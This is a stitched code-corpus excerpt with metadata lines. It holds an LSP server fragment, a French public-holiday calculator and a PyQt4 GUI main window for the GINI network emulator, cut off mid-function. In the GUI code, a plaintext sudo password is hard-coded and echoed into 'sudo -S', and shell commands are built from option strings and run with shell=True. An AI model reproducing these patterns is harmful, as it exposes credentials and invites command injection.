params: ExecuteCommandParams,
msg_id):
"""Executes commands with passed arguments and returns a value."""
cmd_handler = self.fm.commands[params.command]
self._execute_request(msg_id, cmd_handler, params.arguments)
def get_configuration(self, params, callback):
"""Sends configuration request to the client.
Args:
params(dict): ConfigurationParams from lsp specs
callback(callable): Callabe which will be called after
response from the client is received
Returns:
concurrent.futures.Future object that will be resolved once a
response has been received
"""
return self.send_request(WORKSPACE_CONFIGURATION, params, callback)
def get_configuration_async(self, params):
"""Calls `get_configuration` method but designed to use with coroutines
Args:
params(dict): ConfigurationParams from lsp specs
Returns:
asyncio.Future that can be awaited
"""
return asyncio.wrap_future(self.get_configuration(params, None))
def publish_diagnostics(self, doc_uri: str, diagnostics: List[Diagnostic]):
"""Sends diagnostic notification to the client."""
self.notify(TEXT_DOCUMENT_PUBLISH_DIAGNOSTICS,
PublishDiagnosticsParams(uri=doc_uri, diagnostics=diagnostics))
def register_capability(self, params: RegistrationParams, callback):
"""Register a new capability on the client.
Args:
params(RegistrationParams): RegistrationParams from lsp specs
callback(callable): Callabe which will be called after
response from the client is received
Returns:
concurrent.futures.Future object that will be resolved once a
response has been received
"""
return self.send_request(CLIENT_REGISTER_CAPABILITY, params, callback)
def register_capability_async(self, params: RegistrationParams):
"""Register a new capability on the client.
Args:
params(RegistrationParams): RegistrationParams from lsp specs
callback(callable): Callabe which will be called after
response from the client is received
Returns:
asyncio.Future object that will be resolved once a
response has been received
"""
return asyncio.wrap_future(self.register_capability(params, None))
def show_message(self, message, msg_type=MessageType.Info):
"""Sends message to the client to display message."""
self.notify(WINDOW_SHOW_MESSAGE, ShowMessageParams(type=msg_type, message=message))
def show_message_log(self, message, msg_type=MessageType.Log):
"""Sends message to the client's output channel."""
self.notify(WINDOW_LOG_MESSAGE, LogMessageParams(type=msg_type, message=message))
def unregister_capability(self, params: UnregistrationParams, callback):
"""Unregister a new capability on the client.
Args:
params(UnregistrationParams): UnregistrationParams from lsp specs
callback(callable): Callabe which will be called after
response from the client is received
Returns:
concurrent.futures.Future object that will be resolved once a
response has been received
"""
return self.send_request(CLIENT_UNREGISTER_CAPABILITY, params, callback)
def unregister_capability_async(self, params: UnregistrationParams):
"""Unregister a new capability on the client.
Args:
params(UnregistrationParams): UnregistrationParams from lsp specs
callback(callable): Callabe which will be called after
response from the client is received
Returns:
asyncio.Future object that will be resolved once a
response has been received
"""
return asyncio.wrap_future(self.unregister_capability(params, None))
|
mit
| 1,117,900,913,965,417,300
| 38.09404
| 117
| 0.599336
| false
| 4.543719
| true
| false
| false
|
simonpessemesse/seguinus
|
chambres/joursFerie.py
|
1
|
5799
|
#!/usr/bin/python
# -*- coding: iso-8859-1 -*-
def datepaques(an):
"""Calcule la date de Paques d'une annee donnee an (=nombre entier)"""
a = an // 100
b = an % 100
c = (3 * (a + 25)) // 4
d = (3 * (a + 25)) % 4
e = (8 * (a + 11)) // 25
f = (5 * a + b) % 19
g = (19 * f + c - e) % 30
h = (f + 11 * g) // 319
j = (60 * (5 - d) + b) // 4
k = (60 * (5 - d) + b) % 4
m = (2 * j - k - g + h) % 7
n = (g - h + m + 114) // 31
p = (g - h + m + 114) % 31
jour = p + 1
mois = n
return [jour, mois, an]
def datechaine(d, sep='/'):
"""Transforme une date liste=[j,m,a] en une date chaîne 'jj/mm/aaaa'"""
return ("%02d" + sep + "%02d" + sep + "%0004d") % (d[0], d[1], d[2])
def dateliste(c, sep='/'):
"""Transforme une date chaîne 'j/m/a' en une date liste [j,m,a]"""
j, m, a = c.split(sep)
return [int(j), int(m), int(a)]
def jourplus(d, n=1):
"""Donne la date du nième jour suivant d=[j, m, a] (n>=0)"""
j, m, a = d
fm = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
if (a % 4 == 0 and a % 100 != 0) or a % 400 == 0: # bissextile?
fm[2] = 29
for i in range(0, n):
j += 1
if j > fm[m]:
j = 1
m += 1
if m > 12:
m = 1
a += 1
return [j, m, a]
def jourmoins(d, n=-1):
"""Donne la date du nième jour précédent d=[j, m, a] (n<=0)"""
j, m, a = d
fm = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
if (a % 4 == 0 and a % 100 != 0) or a % 400 == 0: # bissextile?
fm[2] = 29
for i in range(0, abs(n)):
j -= 1
if j < 1:
m -= 1
if m < 1:
m = 12
a -= 1
j = fm[m]
return [j, m, a]
def numjoursem(d):
"""Donne le numero du jour de la semaine d'une date d=[j,m,a]
lundi=1, mardi=2, ..., dimanche=7
Algorithme de Maurice Kraitchik (1882–1957)"""
j, m, a = d
if m < 3:
m += 12
a -= 1
n = (j + 2 * m + (3 * (m + 1)) // 5 + a + a // 4 - a // 100 + a // 400 + 2) % 7
return [6, 7, 1, 2, 3, 4, 5][n]
def joursem(d):
"""Donne le jour de semaine en texte a partir de son numero
lundi=1, mardi=2, ..., dimanche=7"""
return ["", "lundi", "mardi", "mercredi", "jeudi", "vendredi", "samedi",
"dimanche"][numjoursem(d)]
def joursferiesliste(an, sd=0):
"""Liste des jours feries France en date-liste de l'annee an (nb entier).
sd=0 (=defaut): tous les jours feries.
sd=1: idem sans les sammedis-dimanches.
sd=2: tous + les 2 jours feries supplementaires d'Alsace-Moselle.
sd=3: idem sd=2 sans les samedis-dimanches"""
F = [] # =liste des dates des jours feries en date-liste d=[j,m,a]
L = [] # =liste des libelles du jour ferie
dp = datepaques(an)
# Jour de l'an
d = [1, 1, an]
nj = numjoursem(d)
if (sd == 0) or (sd == 1 and nj < 6) or (sd == 2) or (sd == 3 and nj < 6):
F.append(d)
L.append("Jour de l'an")
# Vendredi saint (pour l'Alsace-Moselle)
d = jourmoins(dp, -2)
if sd >= 2:
F.append(d)
L.append("Vendredi saint")
# Dimanche de Paques
d = dp
if (sd == 0) or (sd == 2):
F.append(d)
L.append("Dimanche de Paques")
# Lundi de Paques
d = jourplus(dp, +1)
F.append(d)
L.append("Lundi de Paques")
# Fete du travail
d = [1, 5, an]
nj = numjoursem(d)
if (sd == 0) or (sd == 1 and nj < 6) or (sd == 2) or (sd == 3 and nj < 6):
F.append(d)
L.append("Fete du travail")
# Victoire des allies 1945
d = [8, 5, an]
nj = numjoursem(d)
if (sd == 0) or (sd == 1 and nj < 6) or (sd == 2) or (sd == 3 and nj < 6):
F.append(d)
L.append("Victoire des allies 1945")
# Jeudi de l'Ascension
d = jourplus(dp, +39)
F.append(d)
L.append("Jeudi de l'Ascension")
# Dimanche de Pentecote
d = jourplus(dp, +49)
if (sd == 0) or (sd == 2):
F.append(d)
L.append("Dimanche de Pentecote")
# Lundi de Pentecote
d = jourplus(d, +1)
F.append(d)
L.append("Lundi de Pentecote")
# Fete Nationale
d = [14, 7, an]
nj = numjoursem(d)
if (sd == 0) or (sd == 1 and nj < 6) or (sd == 2) or (sd == 3 and nj < 6):
F.append(d)
L.append("Fete Nationale")
# Assomption
d = [15, 8, an]
nj = numjoursem(d)
if (sd == 0) or (sd == 1 and nj < 6) or (sd == 2) or (sd == 3 and nj < 6):
F.append(d)
L.append("Assomption")
# Toussaint
d = [1, 11, an]
nj = numjoursem(d)
if (sd == 0) or (sd == 1 and nj < 6) or (sd == 2) or (sd == 3 and nj < 6):
F.append(d)
L.append("Toussaint")
# Armistice 1918
d = [11, 11, an]
nj = numjoursem(d)
if (sd == 0) or (sd == 1 and nj < 6) or (sd == 2) or (sd == 3 and nj < 6):
F.append(d)
L.append("Armistice 1918")
# Jour de Noel
d = [25, 12, an]
nj = numjoursem(d)
if (sd == 0) or (sd == 1 and nj < 6) or (sd == 2) or (sd == 3 and nj < 6):
F.append(d)
L.append("Jour de Noel")
# Saint Etienne (pour l'Alsace-Moselle)
d = [26, 12, an]
nj = numjoursem(d)
if (sd == 2) or (sd == 3 and nj < 6):
F.append(d)
L.append("Saint Etienne")
return F, L
def estferie(d, sd=0):
"""estferie(d,sd=0): => dit si une date d=[j,m,a] donnee est feriee France
si la date est feriee, renvoie son libelle
sinon, renvoie une chaine vide"""
j, m, a = d.day, d.month, d.year
F, L = joursferiesliste(a, sd)
for i in range(0, len(F)):
if j == F[i][0] and m == F[i][1] and a == F[i][2]:
return L[i]
return ""
|
gpl-2.0
| 4,589,852,060,434,486,000
| 27.24878
| 83
| 0.473493
| false
| 2.454854
| false
| false
| false
|
anrl/gini3
|
frontend/src/gbuilder/UI/MainWindow.py
|
1
|
59141
|
"""The main window for gbuilder 2.0"""
import os, time, math, subprocess, sys
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from DropBar import *
from LogWindow import *
from Canvas import *
from Node import *
from Edge import *
from Configuration import *
from Core.globals import *
import thread
import socket
import atexit
import fcntl
import struct
from ExportWindow import *
from SendDirectoryWindow import *
from Properties import *
from Systray import *
from Network.gclient import *
from Core.Compiler import *
from TabWidget import *
from Tutorial import *
from TaskManagerWindow import *
import Core.globals
from Wireless.ClientAPI import *
from Wireless.ServerAPI import *
class MainWindow(Systray):
def __init__(self,app):
"""
Create a main window for the application
"""
defaultOptions["palette"]=app.palette()
Systray.__init__(self)
self.expansions=0
self.client=None
self.server=None
self.wserverIP=None
self.wserverPort=None
self.wgini_client=None
self.wgini_server=None
self.running=False
self.recovery=False
mainWidgets["main"] = self
mainWidgets["app"] = app
self.canvas = Canvas(self)
mainWidgets["canvas"] = self.canvas
self.tabWidget = TabWidget(self)
mainWidgets["tab"] = self.tabWidget
self.setCentralWidget(self.tabWidget)
#self.setCentralWidget(self.canvas)
self.createActions()
self.createMenus()
self.createToolBars()
self.createStatusBar()
self.createDockWindows()
self.createConfigWindows()
self.createPopupWindows()
self.createProgressBar()
self.newScene()
self.debugWindow.hide()
self.tm.hide()
self.routes.hide()
self.setVisible(True)
self.center()
self.saveLayout(environ["config"] + "defaultLayout")
self.setStyleSheet("""QToolTip {
background-color: black;
color: white;
border: black solid 1px
}""")
self.defaultLayout = True
if options["restore"]:
self.loadLayout()
self.defaultLayout = False
self.loadProject()
atexit.register(self.cleanup)
def center(self):
"""
Center the window.
"""
screen = QtGui.QDesktopWidget().screenGeometry()
rect = self.geometry()
self.move((screen.width()-rect.width())/2, (screen.height()-rect.height())/2)
self.show()
def getProject(self):
"""
Return the project.
"""
return self.project
def startTutorial(self):
"""
Start the interactive tutorial.
"""
if isinstance(mainWidgets["canvas"], Tutorial):
self.log.append("You are already doing the tutorial! If you would like to stop or restart, select 'Close' from the File menu now.")
return
if not self.closeTopology():
return
self.project = "Tutorial"
self.filename = ""
self.canvas = Tutorial(self)
mainWidgets["canvas"] = self.canvas
self.tabWidget.removeTab(0)
self.tabWidget.addTab(self.canvas, "Tutorial")
self.canvas.start()
for nodeType in nodeTypes.keys():
itemTypes = nodeTypes[nodeType]
itemTypes[nodeType] = 0
self.properties.clear()
self.interfaces.clear()
self.routes.clear()
self.resetLayout(True)
self.lockDocks()
def lockDocks(self):
"""
Lock the dock windows so they cannot be moved, closed or resized.
"""
self.tm.hide()
for dock in self.docks.values():
dock.setFeatures(dock.NoDockWidgetFeatures)
def unlockDocks(self):
"""
Unlock the dock windows.
"""
self.tm.show()
for dock in self.docks.values():
dock.setFeatures(dock.DockWidgetClosable | dock.DockWidgetMovable | dock.DockWidgetFloatable)
def faq(self):
"""
Open the FAQ in the default browser.
"""
olddir = os.getcwd()
os.chdir(environ["doc"])
loadpath = os.getcwd()
os.chdir(olddir)
if environ["os"] == "Windows":
url = QtCore.QUrl("file:///" + loadpath + "/FAQ.html")
else:
url = QtCore.QUrl("file://" + loadpath + "/FAQ.html")
QtGui.QDesktopServices.openUrl(url)
def closeTopology(self,usedyRouters=usedyRouters):
"""
Close the current topology.
"""
if self.running:
self.log.append("You cannot close a topology when one is still running!")
return False
scene = self.canvas.scene()
if scene and scene.items():
reply = QtGui.QMessageBox.warning(self, self.tr(Core.globals.PROG_NAME), self.tr("Save before closing?"), QtGui.QMessageBox.Yes | QtGui.QMessageBox.No | QtGui.QMessageBox.Cancel)
if reply == QtGui.QMessageBox.Yes:
if not self.saveTopology():
return False
elif reply == QtGui.QMessageBox.No:
pass
else:
return False
if isinstance(mainWidgets["canvas"], Tutorial):
self.canvas = Canvas(self)
mainWidgets["canvas"] = self.canvas
self.tabWidget.removeTab(0)
self.tabWidget.addTab(self.canvas, "Default Project")
self.project = ""
self.unlockDocks()
self.filename = ""
scene = Scene(self.canvas)
scene.setItemIndexMethod(QtGui.QGraphicsScene.NoIndex)
self.canvas.setScene(scene)
self.expansions = 0
for nodeType in nodeTypes.keys():
itemTypes = nodeTypes[nodeType]
itemTypes[nodeType] = 0
if usedyRouters:
for yunid, yun in usedyRouters.iteritems():
availableyRouters.append(yun)
availableyRouters.sort(key=lambda YunEntity: YunEntity['ID'])
usedyRouters = {}
self.properties.clear()
self.interfaces.clear()
self.routes.clear()
return True
def sendFile(self):
"""
Start a process to select and send a file to the server.
"""
if not self.server or self.server.poll() != None:
self.log.append("Please start the server first!")
return
if not self.client or not self.client.isConnected():
self.startClient()
filename = self.loadFile("All Files (*.*)")
if not filename:
return
self.sendWindow.setFilename(filename)
self.sendWindow.show()
def newScene(self):
"""
Close the current topology and create a new one.
"""
if self.running:
self.log.append("You cannot create a new topology when one is still running!")
return
if isinstance(mainWidgets["canvas"], Tutorial):
self.log.append("You cannot create a new topology during the tutorial!")
return
if not self.closeTopology(usedyRouters):
return
self.expandScene()
def expandScene(self):
"""
Expand the scene based on number of expansions.
"""
x = 175 + self.expansions * 30
y = 160 + self.expansions * 20
scene = self.canvas.scene()
item = QtGui.QGraphicsLineItem(-x, -y, x, y)
scene.addItem(item)
scene.removeItem(item)
self.expansions += 1
def newProject(self):
"""
Create a new project for device sharing.
"""
if self.running:
self.log.append("You cannot create a new project when one is still running!")
return
if isinstance(mainWidgets["canvas"], Tutorial):
self.log.append("You cannot create a new project during the tutorial!")
return
filename = self.saveFile("gproj")
if filename.isEmpty():
return
projectname = str(filename).split("/")[-1].strip(".gproj")
from Core.Item import nodeTypes
for nodeType in nodeTypes:
if projectname.startswith(nodeType + "_"):
self.popup.setWindowTitle("Invalid Project Name")
self.popup.setText("You cannot name a project starting with the name of a device and underscore!")
self.popup.show()
return
self.project = str(filename)
file = QtCore.QFile(filename)
if not file.open(QtCore.QFile.WriteOnly | QtCore.QFile.Text):
QtGui.QMessageBox.warning(self, self.tr("Save Error"),
self.tr("Cannot write file %1:\n%2.")
.arg(self.filename)
.arg(file.errorString()))
return
out = QtCore.QTextStream(file)
QtGui.QApplication.setOverrideCursor(QtCore.Qt.WaitCursor)
if options["username"]:
out << "username=" + options["username"] + "\n"
else:
self.log.append("Warning, no username is specified!")
if options["session"]:
out << "session=" + options["session"] + "\n"
elif options["server"]:
out << "server=" + options["server"] + "\n"
else:
self.log.append("Warning, no server or session name is specified!")
QtGui.QApplication.restoreOverrideCursor()
self.tabWidget.addTab(self.canvas, projectname)
def openProject(self):
"""
Load an existing project for device sharing.
"""
if self.running:
self.log.append("You cannot open a project when one is still running!")
return
if isinstance(mainWidgets["canvas"], Tutorial):
self.log.append("You cannot open a project during the tutorial!")
return
filename = self.loadFile("GPROJ (*.gproj)")
if filename.isEmpty():
return
self.project = str(filename)
self.loadProject()
def loadProject(self):
"""
Load project file data into options.
"""
if not self.project:
self.tabWidget.addTab(self.canvas, "Default Project")
return
file = QtCore.QFile(self.project)
if not file.open(QtCore.QFile.ReadOnly | QtCore.QFile.Text):
QtGui.QMessageBox.warning(self, self.tr("Load Error"),
self.tr("Cannot read file %1:\n%2.")
.arg(self.project)
.arg(file.errorString()))
self.tabWidget.addTab(self.canvas, "Default Project")
return
_in = QtCore.QTextStream(file)
QtGui.QApplication.setOverrideCursor(QtCore.Qt.WaitCursor)
while not _in.atEnd():
line = str(_in.readLine())
option, value = line.split("=", 1)
options[option] = value
self.configWindow.updateSettings()
QtGui.QApplication.restoreOverrideCursor()
projectname = self.project.split("/")[-1].strip(".gproj")
self.tabWidget.addTab(self.canvas, projectname)
def closeProject(self):
"""
Close the current project.
"""
if self.running:
self.log.append("You cannot close a project when it is still running!")
return
if isinstance(mainWidgets["canvas"], Tutorial):
self.log.append("You cannot close a project during the tutorial!")
return
if self.tabWidget.count() == 1:
self.tabWidget.addTab(self.canvas, "Default Project")
self.project = ""
else:
self.tabWidget.removeTab(0)
def export(self):
"""
Open an export window to generate an image from the canvas.
"""
self.exportWindow.show()
def startBackend(self):
"""
Start the backend server.
"""
self.startServer()
#self.startClient()
def setRecovery(self, recovery):
"""
Set the recovering state of the topology.
"""
self.recovery = recovery
def isRunning(self):
"""
Returns whether a topology is running or not.
"""
return self.running
def startWServer(self):
"""
Call the startwgini_server function
"""
self.startwgini_server()
#thread.join()
def startServer(self):
"""
Start the server backend of gbuilder, which controls running topologies.
"""
if self.server and self.server.poll() == None:
self.log.append("A server is already running!")
return
base = "ssh -t " + options["username"] + "@" + options["server"]
tunnel = " -L " + options["localPort"] + ":localhost:" + options["remotePort"]
server = "bash -c -i 'gserver " + options["remotePort"] + "' || sleep 5"
command = ""
gserver = "gserver"
if environ["os"] == "Windows":
startpath = environ["tmp"] + "gserver.start"
try:
startFile = open(startpath, "w")
startFile.write("echo -ne \"\\033]0;" + gserver + "\\007\"\n")
startFile.write(server)
startFile.close()
except:
self.log.append("Failed to write to start file!")
return
command += "putty -"
if options["session"]:
command += "load " + options["session"] + " -l " + options["username"] + " -t"
else:
command += base
command += tunnel + " -m \"" + startpath + "\""
else:
command += "rxvt -T \"" + gserver + "\" -e " + base + tunnel + " \" " + server + "\""
self.server = subprocess.Popen(str(command), shell=True,preexec_fn=os.setpgrp)
def startwgini_server(self):
"""
Start the wireless GINI server
"""
base = "ssh -t " + options["username"] + "@" + options["wserver"]
tunnel = " -L " + options["wlocalPort"] + ":localhost:" + options["wremotePort"]
server = "bash -c -i 'ServerAPI'"
command = ""
gserver = "WGINI Server"
command += "rxvt -T \"" + gserver + "\" -e " + base + tunnel + " \" " + server + "\""
sudoPassword = 'livelifeking123'
command1 = 'route add -net 192.168.0.0 gw 192.168.54.24 netmask 255.255.255.0 eth1' #change accordingly!
p = os.system('echo %s|sudo -S %s' % (sudoPassword, command1))
self.wgini_server = subprocess.Popen(str(command), shell=True,preexec_fn=os.setpgrp)
def startClient(self):
"""
Start the client of gbuilder, which communicates with the server.
"""
self.client = Client(self)
self.client.connectTo("localhost", int(options["localPort"]), 10)
#self.client.start()
mainWidgets["client"] = self.client
def compile(self):
"""
Compile the current topology.
"""
if self.running:
self.log.append("You cannot compile a topology when one is still running!")
return False
if self.saveTopology() == False:
return False
scene = self.canvas.scene()
compiler = Compiler(scene.items(), self.filename)
xmlFile = compiler.compile()
self.properties.display()
self.interfaces.display()
self.routes.display()
if xmlFile:
self.statusBar().showMessage(self.tr("Compiled '%1'").arg(xmlFile), 2000)
return True
else:
self.statusBar().showMessage(self.tr("Compile failed"), 2000)
return False
def run(self):
"""
Run the current topology.
"""
if not self.server or self.server.poll() != None:
self.log.append("Please start the server first!")
return
if not self.client or not self.client.isConnected():
self.startClient()
if self.isRunning() and not self.recovery:
self.log.append("A topology is already running, please stop it first!")
return
scene = self.canvas.scene()
items = scene.items()
if items:
if self.recovery:
self.recovery = False
elif options["autocompile"] and not self.compile():
return
else:
self.log.append("Please create or load a topology first!")
return
options["elasticMode"] = False
xmlFile = self.filename.replace(".gsav", ".xml")
if not os.access(xmlFile, os.F_OK):
self.log.append("Please compile the topology first!")
return
self.tm.show()
#self.progressBar.setValue(0)
self.client.process("file . " + xmlFile)
self.client.send("init " + self.project.split("/")[-1].strip(".gproj"))
self.client.send("canvas %d,%d" % (scene.width(), scene.height()))
for item in items:
if item.device_type == "Mobile" or item.device_type == "Wireless_access_point":
x = item.pos().x()
y = item.pos().y()
self.client.send("mobile %s %d,%d" % (item.getName(), x, y))
self.client.process("start " + xmlFile)
self.running = True
self.canvas.setAcceptDrops(False)
scene = self.canvas.scene()
scene.startRefresh()
scene.clearSelection()
self.properties.clear()
self.interfaces.clear()
self.routes.clear()
def stop(self):
"""
Stop the current running topology.
"""
if not self.server or self.server.poll() != None:
self.log.append("Please start the server first!")
return
if not self.client or not self.client.isConnected():
self.startClient()
if (self.wgini_client is not None) and usedyRouters:
status = self.wgini_client.Delete()
self.log.append(status)
if self.recovery:
self.recovery = False
scene = self.canvas.scene()
activeDevices = False
from Core.Device import Device
for item in scene.items():
if not isinstance(item, Device):
continue
if item.device_type == "Router":
item.stop()
if item.status:
activeDevices = True
if not activeDevices:
self.stopped()
elif not scene.isRefreshing():
scene.startRefresh()
self.client.process("stop")
def stopped(self):
"""
Handle a fully stopped topology.
"""
self.running = False
self.canvas.scene().stopRefresh()
self.tm.hide()
self.canvas.setAcceptDrops(True)
olddir = os.getcwd()
os.chdir(environ["tmp"])
for tmpfile in os.listdir("."):
if tmpfile.startswith("."):
continue
try:
os.remove(tmpfile)
except:
continue
os.chdir(olddir)
def loadFile(self, filetype):
"""
Load a file through a file dialog.
"""
# Qt is very picky in the filename structure but python is not, so we use python
# to form the correct path which will work for both Windows and Linux
olddir = os.getcwd()
os.chdir(environ["sav"])
loadpath = os.getcwd()
os.chdir(olddir)
filename = QtGui.QFileDialog.getOpenFileName(self,
self.tr("Choose a file name"), loadpath,
self.tr(filetype))
return filename
def loadrealTopologyfile(self, filetype):
"""
Load a real topology name
"""
self.popup.setWindowTitle("Topology Names")
self.popup.setText("You are about to select from the list:\n1.Ernet")
self.popup.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)
self.popup.show()
retval = self.popup.exec_()
if retval==1024:
olddir = os.getcwd()
os.chdir(environ["sav"])
os.chdir("exist")
loadpath = os.getcwd()
os.chdir(olddir)
filename = QtGui.QFileDialog.getOpenFileName(self,
self.tr("Choose a file name"), loadpath,
self.tr(filetype))
return filename
def loadrealTopology(self):
"""
Load a real topology.
"""
if self.running:
self.log.append("You cannot load a topology when one is still running!")
return
if isinstance(mainWidgets["canvas"], Tutorial):
self.log.append("You cannot load a topology during the tutorial!")
return
def loadIntoScene(line, *args):
scene = self.canvas.scene()
itemType,arg = line.split(":")
args = str(arg).strip("()").split(",")
if itemType == "edge":
source = scene.findItem(args[0])
dest = scene.findItem(args[1])
if source.device_type == "Mobile" or dest.device_type == "Mobile":
item = Wireless_Connection(source, dest)
else:
item = Connection(source, dest)
scene.addItem(item)
else:
devType, index = str(itemType).rsplit("_", 1)
item = deviceTypes[devType]()
item.setIndex(int(index))
scene.addItem(item)
item.setPos(float(args[0]), float(args[1]))
item.nudge()
return item
def loadProperties(itemDict):
currentInterfaceTarget = None
currentRouteSubnet = None
for item, properties in itemDict.iteritems():
for line in properties:
count = 0
while line.find("\t") == 0:
line = line[1:]
count += 1
prop, value = line.split(":", 1)
if count == 1:
item.setProperty(prop, value)
elif count == 2:
currentInterfaceTarget = self.canvas.scene().findItem(value)
elif count == 3:
item.setInterfaceProperty(prop, value, currentInterfaceTarget)
elif count == 4:
currentRouteSubnet = value
item.addEntry("", "", value, currentInterfaceTarget)
elif count == 5:
item.setEntryProperty(prop, value, currentRouteSubnet, currentInterfaceTarget)
filename = self.loadrealTopologyfile("GSAV (*.gsav)")
if not filename:
return
file = QtCore.QFile(filename)
if not file.open(QtCore.QFile.ReadOnly | QtCore.QFile.Text):
QtGui.QMessageBox.warning(self, self.tr("Load Error"),
self.tr("Cannot read file %1:\n%2.")
.arg(filename)
.arg(file.errorString()))
return
self.newScene()
self.filename = str(filename)
_in = QtCore.QTextStream(file)
yRouters = False
if "yRouter" in str(_in.readAll()):
yRouters = True
QtGui.QMessageBox.warning(self, self.tr("Load Warning"), self.tr("This file contains yRouters, which may not be physically available right now. Any yRouters no longer physically available will automatically be removed from the topology."))
if not self.wgini_server:
if not self.startWGINIClient():
QtGui.QMessageBox.warning(self, self.tr("Load Error"), self.tr("Cannot open file with yRouters without connecting to wireless server."))
return
if yRouters:
self.discover()
QtGui.QApplication.setOverrideCursor(QtCore.Qt.WaitCursor)
itemDict = {}
_in.seek(0)
line = str(_in.readLine())
lines = []
while not _in.atEnd():
item=loadIntoScene(line)
line=str(_in.readLine())
while line.find("\t") == 0:
lines.append(line)
line=str(_in.readLine())
itemDict[item] = lines
lines = []
loadProperties(itemDict)
QtGui.QApplication.restoreOverrideCursor()
self.statusBar().showMessage(self.tr("Loaded '%1'").arg(filename), 2000)
def loadTopology(self):
"""
Load a topology.
"""
if self.running:
self.log.append("You cannot load a topology when one is still running!")
return
if isinstance(mainWidgets["canvas"], Tutorial):
self.log.append("You cannot load a topology during the tutorial!")
return
def loadIntoScene(line, *args):
scene = self.canvas.scene()
itemType,arg = line.split(":")
args = str(arg).strip("()").split(",")
if itemType == "edge":
source = scene.findItem(args[0])
dest = scene.findItem(args[1])
if source.device_type == "Mobile" or dest.device_type == "Mobile":
item = Wireless_Connection(source, dest)
else:
item = Connection(source, dest)
scene.addItem(item)
else:
devType, index = str(itemType).rsplit("_", 1)
item = deviceTypes[devType]()
item.setIndex(int(index))
scene.addItem(item)
item.setPos(float(args[0]), float(args[1]))
item.nudge()
return item
def loadProperties(itemDict):
currentInterfaceTarget = None
currentRouteSubnet = None
for item, properties in itemDict.iteritems():
for line in properties:
count = 0
while line.find("\t") == 0:
line = line[1:]
count += 1
prop, value = line.split(":", 1)
if count == 1:
item.setProperty(prop, value)
elif count == 2:
currentInterfaceTarget = self.canvas.scene().findItem(value)
elif count == 3:
item.setInterfaceProperty(prop, value, currentInterfaceTarget)
elif count == 4:
currentRouteSubnet = value
item.addEntry("", "", value, currentInterfaceTarget)
elif count == 5:
item.setEntryProperty(prop, value, currentRouteSubnet, currentInterfaceTarget)
filename = self.loadFile("GSAV (*.gsav)")
if filename.isEmpty():
return
file = QtCore.QFile(filename)
if not file.open(QtCore.QFile.ReadOnly | QtCore.QFile.Text):
QtGui.QMessageBox.warning(self, self.tr("Load Error"),
self.tr("Cannot read file %1:\n%2.")
.arg(filename)
.arg(file.errorString()))
return
self.newScene()
self.filename = str(filename)
_in = QtCore.QTextStream(file)
yRouters = False
if "yRouter" in str(_in.readAll()):
yRouters = True
QtGui.QMessageBox.warning(self, self.tr("Load Warning"), self.tr("This file contains yRouters, which may not be physically available right now. Any yRouters no longer physically available will automatically be removed from the topology."))
if not self.wgini_server:
if not self.startWGINIClient():
QtGui.QMessageBox.warning(self, self.tr("Load Error"), self.tr("Cannot open file with yRouters without connecting to wireless server."))
return
if yRouters:
self.discover()
QtGui.QApplication.setOverrideCursor(QtCore.Qt.WaitCursor)
itemDict = {}
_in.seek(0)
line = str(_in.readLine())
lines = []
while not _in.atEnd():
item=loadIntoScene(line)
line=str(_in.readLine())
while line.find("\t") == 0:
lines.append(line)
line=str(_in.readLine())
itemDict[item] = lines
lines = []
loadProperties(itemDict)
QtGui.QApplication.restoreOverrideCursor()
self.statusBar().showMessage(self.tr("Loaded '%1'").arg(filename), 2000)
def saveFile(self, filetype):
"""
Save a file through a file dialog.
"""
olddir = os.getcwd()
os.chdir(environ["sav"])
savepath = os.getcwd()
os.chdir(olddir)
filename = QtGui.QFileDialog.getSaveFileName(self,
self.tr("Choose a file name"), savepath,
self.tr(filetype.upper() + " (*.%s)" % filetype))
if filename.isEmpty():
return filename
if not filename.toLower().endsWith("." + filetype):
filename += "." + filetype
return filename
def saveTopologyAs(self):
"""
Save a topology under a given filename.
"""
if not self.canvas.scene().items():
self.log.append("There is nothing to save!")
return False
filename = self.saveFile("gsav")
if filename.isEmpty():
return False
self.filename = str(filename)
return self.saveTopology()
def saveTopology(self):
"""
Save a topology.
"""
scene=self.canvas.scene()
if not scene.items():
self.log.append("There is nothing to save!")
return False
#for first time used
if not self.filename:
return self.saveTopologyAs()
if usedyRouters:
self.popup.setWindowTitle("Save Warning")
self.popup.setText("This topology contains yRouters, which may not be available when loading the project later.")
self.popup.show()
file = QtCore.QFile(self.filename)
if not file.open(QtCore.QFile.WriteOnly | QtCore.QFile.Text):
QtGui.QMessageBox.warning(self, self.tr("Save Error"),
self.tr("Cannot write file %1:\n%2.")
.arg(self.filename)
.arg(file.errorString()))
return False
out = QtCore.QTextStream(file)
QtGui.QApplication.setOverrideCursor(QtCore.Qt.WaitCursor)
outstring = ""
for item in scene.items():
if isinstance(item, Node):
outstring += item.toString()
for item in scene.items():
if isinstance(item, Edge):
outstring += item.toString()
out << outstring
QtGui.QApplication.restoreOverrideCursor()
self.statusBar().showMessage(self.tr("Saved '%1'").arg(self.filename), 2000)
return True
def copy(self):
"""
Copy selected text from the log into the paste buffer.
"""
self.log.copy()
def config(self):
"""
Open the options window.
"""
self.configWindow.show()
def startWGINIClient(self):
"""
Start wireless GINI client
"""
ok=None
if not self.server or self.server.poll() is not None:
self.log.append("You must start the main server before you can start the wireless client!")
elif not self.wgini_server or self.wgini_server.poll() is not None:
self.popup.setWindowTitle("Start server")
self.popup.setText("You must start the WGINI server first! Please start it from the system tray above canvas.")
self.popup.show()
elif self.wgini_client is not None:
self.log.append("Wireless GINI client is already running!")
else:
windowTitle = "Client data"
labelText = "Enter wireless client IP:"
text, ok = self.inputDialog.getText(self.inputDialog, windowTitle, labelText)
if ok:
if not text:
self.log.append("Nothing entered; starting wireless GINI client cancelled!")
return False
else:
ipportip=text
if not (socket.inet_aton(str(ipportip))):
self.log.append("Invalid entry, starting wireless GINI client cancelled.")
return False
self.wserverIP = get_ip_address('eth1')
self.wserverPort = '60000'
wclientIP = str(ipportip)
try:
self.wgini_client= WGINI_Client(self.wserverIP,self.wserverPort,wclientIP)
mainWidgets["wgini_client"]=self.wgini_client
self.log.append("Wireless GINI client connected at %s" %(ipportip[0]))
return True
except:
self.log.append("Starting wireless GINI client failed.")
return False
else:
return False
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
